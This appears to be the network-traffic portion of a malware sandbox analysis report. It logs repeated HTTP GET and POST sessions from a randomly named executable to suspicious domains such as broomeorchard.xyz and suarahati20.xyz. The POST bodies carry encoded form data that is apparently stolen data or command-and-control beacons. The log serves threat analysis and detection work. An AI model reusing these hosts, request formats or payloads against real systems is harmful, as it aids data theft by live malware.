                                                      Data Ascii: N0spilI0=hbrIhRUnKXpFHdcPK0IbX+COuW77gw0a3yinnLbJrbkpB8ahnwSZOwL2rz0pBJ/0O3+WbjH14zNmbrm/nPXIIKaKeqxYHfg1grL3JwWGwUw6hsZsIhc/8abzYLG5t3ijQdNd1jj+ypjrF4SAsFhSkeM5uocHmm6o5/IksiHVts0K9pvWMZnWZQw8oNhyWGFlpicy/ajiJEeUbzRKtUcRbppgqPys1AiL4EWqubdLMjQ9MP76QqcakhqqAZnQcTXyOUyx9JLZpRjA+Gu8sA4XtvgFl7MfG54aH2Ik4cQQE8Zy2Yfd5yXwz+Z8I0VnNBQ+868PSKM78JgzPuGYigE1kLgKGKrys4Hti08eO1TjQCzWJDjccJH/6E1qpbJZRNmUqqumLQbqKw3HDWiubQqcmKoRcFwhQ49J5AXU1J48qVaiVCJc/ZKwpSwl2aTl38c7ww/snbsXlspMJs1LfgHnqPBd3mF/zza/vX1OrIkd/PWKIHMQcmX1TuSx+kD9LZiLKyyIaMK0TBapmE292SmJ9XoTNodzbkooqOk59ZUIOBO5prMDxoIqUz34WDOkA2E5lqh4Uh8+HS2guF2waAVgz2JNCFPB6Q9YCV1s21s3RVxrER/MjzWBdIhJola2MTZr+rRAxazqR1wT1dm09cIqlLCey26rsq8qDrFQtsw2SrCZLeao9CCXhZpYmPa8beQ9bYXMA28DVl5ON7bG6JP3QpORJ+CZOzFCAjxJ1uO64xhfcUgRBkrVtQl5VC2/QkHKeB1Z65eG474j5sN5QYVsSVOf3/QL2CZm9XUjko4wFWs9DuWJAVUya6O7+jp8Lg0Fw3FeNqEIDdibYeUuK4Xppwn5ToknxvLt89M8zDO/+YY+aOdqmSzSMdSu22yWUNIpFkDFQaidrTxZO+yL4lcT5z2EMwznXDWpSG6iCU7yKbJ1u/49xwCw9MeSdxpKXUJQ40N2oQs38vnPU3+/nyYz+/RNVdXYVkfwKmy4VBToqp+ [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.4497733.33.130.19080600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:17.768923998 CEST479OUTGET /2ho9/?N0spilI0=sZDoihg8ajsFNu4rJh4aU/u18lT0jTMSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3C72rBIAnGZtnn+XzJEmDgEkU4cQofgEFxbM=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.consultarfacil.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:38:18.215224981 CEST404INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 25 Sep 2024 03:38:18 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 264
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 30 73 70 69 6c 49 30 3d 73 5a 44 6f 69 68 67 38 61 6a 73 46 4e 75 34 72 4a 68 34 61 55 2f 75 31 38 6c 54 30 6a 54 4d 53 78 79 62 4f 73 35 33 63 6f 37 46 6f 43 73 71 75 6c 68 43 4e 49 6c 37 71 6d 78 39 2b 43 70 44 66 4b 69 4c 33 42 52 72 78 33 6b 70 46 53 35 79 2b 74 4c 53 33 43 37 32 72 42 49 41 6e 47 5a 74 6e 6e 2b 58 7a 4a 45 6d 44 67 45 6b 55 34 63 51 6f 66 67 45 46 78 62 4d 3d 26 56 76 6e 3d 58 74 4a 4c 45 36 4b 58 79 48 4a 30 31 30 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?N0spilI0=sZDoihg8ajsFNu4rJh4aU/u18lT0jTMSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3C72rBIAnGZtnn+XzJEmDgEkU4cQofgEFxbM=&Vvn=XtJLE6KXyHJ010P"}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.44977415.197.204.5680600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:23.284563065 CEST745OUTPOST /8o1o/ HTTP/1.1
                                                      Host: www.broomeorchard.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.broomeorchard.xyz
                                                      Referer: http://www.broomeorchard.xyz/8o1o/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 64 73 50 42 57 52 7a 48 47 58 68 74 44 69 53 50 67 43 76 43 70 6b 35 50 41 55 57 6c 5a 58 4e 54 38 78 43 61 4b 78 33 76 37 6c 44 45 77 52 65 41 68 78 36 2b 41 59 4b 6b 37 58 76 7a 74 42 32 68 46 49 75 55 66 34 49 6f 36 50 6d 61 44 70 5a 49 6c 49 71 34 55 49 30 51 2f 46 30 34 71 4f 31 59 32 4f 4c 69 71 72 63 56 61 79 44 33 4d 6b 62 33 68 4b 45 36 4d 47 51 68 54 45 54 70 6f 4c 55 6f 39 65 39 49 6f 4a 49 46 71 53 45 6b 66 56 4c 48 39 50 4f 76 72 71 6b 49 4e 4e 38 4f 73 44 4b 46 77 46 69 6e 48 6c 49 79 4f 5a 33 5a 57 33 4a 4b 34 37 33 49 4d 49 52 66 47 43 37 58 79 6f 48 43 4a 41 3d 3d
                                                      Data Ascii: N0spilI0=dsPBWRzHGXhtDiSPgCvCpk5PAUWlZXNT8xCaKx3v7lDEwReAhx6+AYKk7XvztB2hFIuUf4Io6PmaDpZIlIq4UI0Q/F04qO1Y2OLiqrcVayD3Mkb3hKE6MGQhTETpoLUo9e9IoJIFqSEkfVLH9POvrqkINN8OsDKFwFinHlIyOZ3ZW3JK473IMIRfGC7XyoHCJA==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.44977515.197.204.5680600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:25.831094027 CEST765OUTPOST /8o1o/ HTTP/1.1
                                                      Host: www.broomeorchard.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.broomeorchard.xyz
                                                      Referer: http://www.broomeorchard.xyz/8o1o/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 64 73 50 42 57 52 7a 48 47 58 68 74 42 42 61 50 69 68 48 43 68 6b 35 49 64 6b 57 6c 53 33 4e 50 38 78 2b 61 4b 77 43 79 37 57 33 45 78 30 69 41 6d 30 4f 2b 44 59 4b 6b 7a 33 75 34 6a 68 32 2b 46 49 69 36 66 39 77 6f 36 50 79 61 44 6f 4a 49 6b 37 43 37 57 59 30 57 35 46 30 2b 75 4f 31 59 32 4f 4c 69 71 76 39 43 61 79 4c 33 4d 77 6e 33 68 76 6b 39 42 6d 51 2b 51 45 54 70 73 4c 55 73 39 65 39 36 6f 4e 4a 6f 71 58 41 6b 66 56 37 48 7a 2b 4f 73 79 61 6b 43 44 74 39 41 73 51 33 5a 77 48 61 6e 4a 45 38 31 45 59 32 2b 58 78 59 51 70 4b 57 66 65 49 31 73 62 46 79 6a 2f 72 36 4c 53 41 42 55 72 37 4a 78 51 4c 49 41 67 2f 66 78 69 53 5a 45 79 78 49 3d
                                                      Data Ascii: N0spilI0=dsPBWRzHGXhtBBaPihHChk5IdkWlS3NP8x+aKwCy7W3Ex0iAm0O+DYKkz3u4jh2+FIi6f9wo6PyaDoJIk7C7WY0W5F0+uO1Y2OLiqv9CayL3Mwn3hvk9BmQ+QETpsLUs9e96oNJoqXAkfV7Hz+OsyakCDt9AsQ3ZwHanJE81EY2+XxYQpKWfeI1sbFyj/r6LSABUr7JxQLIAg/fxiSZEyxI=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.44977615.197.204.5680600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:28.546482086 CEST10847OUTPOST /8o1o/ HTTP/1.1
                                                      Host: www.broomeorchard.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.broomeorchard.xyz
                                                      Referer: http://www.broomeorchard.xyz/8o1o/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 64 73 50 42 57 52 7a 48 47 58 68 74 42 42 61 50 69 68 48 43 68 6b 35 49 64 6b 57 6c 53 33 4e 50 38 78 2b 61 4b 77 43 79 37 57 76 45 77 47 61 41 6d 54 53 2b 43 59 4b 6b 35 58 75 37 6a 68 32 33 46 49 36 2b 66 39 30 65 36 4a 32 61 41 50 4a 49 78 36 43 37 63 59 30 57 30 6c 30 2f 71 4f 30 46 32 50 37 63 71 72 5a 43 61 79 4c 33 4d 78 33 33 31 71 45 39 44 6d 51 68 54 45 54 75 6f 4c 56 37 39 65 46 51 6f 4e 4d 56 71 44 30 6b 52 56 72 48 78 49 61 73 37 61 6b 45 45 74 38 64 73 51 37 77 77 48 48 63 4a 45 49 54 45 59 43 2b 55 77 70 78 75 72 53 57 63 72 56 64 59 48 43 44 37 61 61 52 56 54 31 33 36 4c 78 51 47 2f 45 30 72 34 75 4e 2b 54 56 52 70 46 50 6d 51 4d 48 6f 38 58 47 4c 44 67 4d 65 2f 6f 2b 62 63 4e 49 63 69 76 5a 53 39 6a 4a 39 46 34 39 46 76 38 74 49 69 38 79 76 38 2b 70 36 48 39 51 54 42 39 78 31 4f 33 47 61 4b 6f 65 6d 79 52 76 48 76 52 43 67 70 58 42 78 50 6e 77 34 72 43 59 50 76 66 65 59 43 31 43 6b 4c 54 72 6b 46 75 34 32 62 30 4b 56 71 5a 4d 49 74 56 4b 33 63 56 77 37 67 [TRUNCATED]
                                                      Data Ascii: N0spilI0=dsPBWRzHGXhtBBaPihHChk5IdkWlS3NP8x+aKwCy7WvEwGaAmTS+CYKk5Xu7jh23FI6+f90e6J2aAPJIx6C7cY0W0l0/qO0F2P7cqrZCayL3Mx331qE9DmQhTETuoLV79eFQoNMVqD0kRVrHxIas7akEEt8dsQ7wwHHcJEITEYC+UwpxurSWcrVdYHCD7aaRVT136LxQG/E0r4uN+TVRpFPmQMHo8XGLDgMe/o+bcNIcivZS9jJ9F49Fv8tIi8yv8+p6H9QTB9x1O3GaKoemyRvHvRCgpXBxPnw4rCYPvfeYC1CkLTrkFu42b0KVqZMItVK3cVw7gpKYcGxx0RL06BQgOqo5Q+GR4UBgvUWH5xcia7MKo4kW7b52MVnxbLcXIzPYGqMvGh4NcVibqAI1Lh8CjurYUGh/QkcyqEanyCaAsRf+Nsu8pSZY2tAcOxmJCoZybnsXkz4m8e8BB9bHFJVEmDztQSi2wkSN8DezYLoBKqBoFHCqWzGL+omaXH+6+nwQgKjvUlRSb+acwt0gRzxU4CjwvHc6pLkkA/9wgMRx5oaVVXcbLcCraH3s6rSKcRh8OkR6x5OF+Zo/T+N0c+InXKkcFfvKprHt2yiAnlv+QDQnpEREWIZvOzqkt0KEYVMPXIS3X5Ja3i4/HQhLHWSA1PyS+usNMXtQTC5Wtlq/sHYVPPRw5sbCt31GAIMxlzlh7ncA/EDFtgItbLuu6wXIaguvLvegDUPOn6xm8trqPnB0nF59Kw8i9I25MM7Ze1Y5po1wn9nf0ThxU+mIEenMpAAgxsh1hf5oA7fiLrvTsb3YfCHCKPMfTxC1eRKtgph4Fg3kpVuHz4gIde8H9itIhOQlKxDPJ0DLTppkP0oI8UmFFCsB2QAakzBAsvuOp37u3bvtN/IktvvinpZStwZJ1RBb4FPevbbIhE5iDfO9JdxfKLBwG7l7ipmIrSvMuc4U8G5uJ6JO9FG6a5a+bRT9m55VZdvPQ0qLKJf3++j [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.44977715.197.204.5680600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:31.094681978 CEST475OUTGET /8o1o/?N0spilI0=QunhVm6kZFQCJjGjii7PtVl4QBOBSEhunS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjW/EB0lpOjo9F2+iOt7QfZRjcLyTCi7EuLmU=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.broomeorchard.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:38:31.546632051 CEST404INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 25 Sep 2024 03:38:31 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 264
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 30 73 70 69 6c 49 30 3d 51 75 6e 68 56 6d 36 6b 5a 46 51 43 4a 6a 47 6a 69 69 37 50 74 56 6c 34 51 42 4f 42 53 45 68 75 6e 53 33 34 43 77 47 4e 79 68 47 34 32 46 2b 55 32 51 71 32 42 62 65 6a 36 48 53 39 6d 68 2b 4d 45 65 4b 46 66 4c 41 6a 38 35 69 79 56 4a 35 43 73 4a 44 6a 57 2f 45 42 30 6c 70 4f 6a 6f 39 46 32 2b 69 4f 74 37 51 66 5a 52 6a 63 4c 79 54 43 69 37 45 75 4c 6d 55 3d 26 56 76 6e 3d 58 74 4a 4c 45 36 4b 58 79 48 4a 30 31 30 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?N0spilI0=QunhVm6kZFQCJjGjii7PtVl4QBOBSEhunS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjW/EB0lpOjo9F2+iOt7QfZRjcLyTCi7EuLmU=&Vvn=XtJLE6KXyHJ010P"}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.449778198.252.106.19180600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:37.135612011 CEST739OUTPOST /4est/ HTTP/1.1
                                                      Host: www.suarahati20.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.suarahati20.xyz
                                                      Referer: http://www.suarahati20.xyz/4est/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 33 52 4b 49 4e 38 72 75 4b 58 69 59 52 65 44 38 59 31 44 58 33 63 41 4e 48 6a 51 77 76 44 73 58 58 77 4f 48 4b 68 50 64 42 36 54 61 51 6b 4b 64 70 67 61 63 32 65 72 7a 44 47 43 53 4a 59 54 4a 59 4e 4e 31 6c 4b 31 63 45 6c 46 53 44 32 78 6f 54 4f 4a 54 6c 71 73 33 45 31 33 39 75 35 64 70 35 65 6c 6f 59 41 58 6b 76 33 6e 63 34 6f 75 4b 45 74 52 36 56 2b 4b 61 72 36 32 31 2f 46 4e 6b 4d 45 79 30 58 69 54 71 79 4e 6a 64 47 31 6a 64 70 65 4b 39 72 6f 6c 73 47 4b 32 62 67 37 65 59 69 2f 4b 75 62 73 61 4b 78 79 36 42 38 55 74 4b 57 77 6d 65 6e 37 4d 44 62 30 51 4f 37 50 52 54 7a 77 3d 3d
                                                      Data Ascii: N0spilI0=3RKIN8ruKXiYReD8Y1DX3cANHjQwvDsXXwOHKhPdB6TaQkKdpgac2erzDGCSJYTJYNN1lK1cElFSD2xoTOJTlqs3E139u5dp5eloYAXkv3nc4ouKEtR6V+Kar621/FNkMEy0XiTqyNjdG1jdpeK9rolsGK2bg7eYi/KubsaKxy6B8UtKWwmen7MDb0QO7PRTzw==
                                                      Sep 25, 2024 05:38:37.550028086 CEST1033INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 25 Sep 2024 03:38:37 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.449779198.252.106.19180600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:39.686003923 CEST759OUTPOST /4est/ HTTP/1.1
                                                      Host: www.suarahati20.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.suarahati20.xyz
                                                      Referer: http://www.suarahati20.xyz/4est/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 33 52 4b 49 4e 38 72 75 4b 58 69 59 51 2b 54 38 61 57 37 58 31 38 41 4d 62 7a 51 77 6d 6a 73 4c 58 77 43 48 4b 67 62 4e 42 49 6e 61 51 46 36 64 6f 68 61 63 7a 65 72 7a 62 57 43 58 52 34 54 65 59 4e 78 39 6c 4c 6c 63 45 6c 52 53 44 33 74 6f 54 39 68 51 6c 36 73 31 4d 56 33 37 78 4a 64 70 35 65 6c 6f 59 41 44 4f 76 33 76 63 34 59 65 4b 46 4d 52 39 4a 4f 4b 5a 37 71 32 31 37 46 4e 67 4d 45 79 61 58 6d 4c 51 79 4f 62 64 47 77 50 64 6f 50 4c 72 68 6f 6c 71 4a 71 33 36 72 4f 7a 4a 6e 66 2f 35 54 71 53 7a 7a 69 32 6d 30 79 38 51 48 42 48 4a 31 37 6f 77 47 7a 5a 36 32 4d 73 61 6f 35 6b 66 7a 5a 50 36 33 56 77 48 61 74 43 46 51 7a 55 6a 48 77 6b 3d
                                                      Data Ascii: N0spilI0=3RKIN8ruKXiYQ+T8aW7X18AMbzQwmjsLXwCHKgbNBInaQF6dohaczerzbWCXR4TeYNx9lLlcElRSD3toT9hQl6s1MV37xJdp5eloYADOv3vc4YeKFMR9JOKZ7q217FNgMEyaXmLQyObdGwPdoPLrholqJq36rOzJnf/5TqSzzi2m0y8QHBHJ17owGzZ62Msao5kfzZP63VwHatCFQzUjHwk=
                                                      Sep 25, 2024 05:38:40.237739086 CEST1033INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 25 Sep 2024 03:38:40 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.449780198.252.106.19180600C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 25, 2024 05:38:42.233803988 CEST10841OUTPOST /4est/ HTTP/1.1
                                                      Host: www.suarahati20.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.suarahati20.xyz
                                                      Referer: http://www.suarahati20.xyz/4est/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 33 52 4b 49 4e 38 72 75 4b 58 69 59 51 2b 54 38 61 57 37 58 31 38 41 4d 62 7a 51 77 6d 6a 73 4c 58 77 43 48 4b 67 62 4e 42 49 66 61 54 33 79 64 70 43 79 63 30 65 72 7a 53 32 43 57 52 34 54 66 59 4e 70 35 6c 4f 38 70 45 6e 70 53 44 56 4a 6f 56 4d 68 51 38 4b 73 31 4f 56 33 2b 75 35 64 38 35 65 31 6b 59 41 54 4f 76 33 76 63 34 61 32 4b 4d 39 52 39 61 65 4b 61 72 36 32 35 2f 46 4e 59 4d 46 61 73 58 6d 66 36 78 2b 37 64 47 55 76 64 76 39 6a 72 70 6f 6c 6f 64 4b 33 59 72 4f 32 52 6e 66 6a 31 54 71 4f 56 7a 67 71 6d 33 57 31 4f 57 43 66 33 6b 36 34 59 54 78 35 45 2f 2b 73 48 6c 59 30 7a 6c 4e 72 32 72 42 35 73 66 4d 6a 51 42 7a 4e 6e 5a 77 6e 6a 62 51 4b 4c 71 7a 57 46 45 70 6b 32 63 68 74 36 47 64 4e 41 44 73 57 4f 6a 58 62 72 70 48 51 53 56 77 53 37 6e 4f 37 47 4b 78 41 55 67 6b 47 4a 36 57 56 32 58 53 64 6d 34 4a 69 75 36 43 77 73 70 73 37 74 55 34 39 52 69 63 61 75 53 37 5a 44 67 46 67 66 4a 34 42 6a 72 68 55 45 4a 43 5a 65 69 2f 72 48 63 6e 4e 4b 42 4b 58 6a 69 7a 78 66 41 [TRUNCATED]
